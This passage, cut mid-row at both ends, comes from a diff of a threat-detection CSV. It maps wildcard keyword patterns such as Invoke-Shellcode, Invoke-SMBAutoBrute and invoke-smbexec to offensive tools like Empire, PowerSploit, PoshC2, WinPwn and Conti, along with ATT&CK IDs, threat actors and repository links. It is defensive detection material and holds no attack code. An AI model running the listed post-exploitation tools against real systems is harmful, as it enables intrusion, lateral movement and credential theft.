useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SharpWeb.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpWSUS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-Shellcode -Shellcode*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Shellcode*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*Invoke-Shellcode*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Shellcode.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ShellcodeMSIL*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ShellCommand*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SlinkyCat*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Invoke-SMBAutoBrute*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SMBEnum*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-smbexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SMBAutoBrute*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-smbclient *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBClient*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 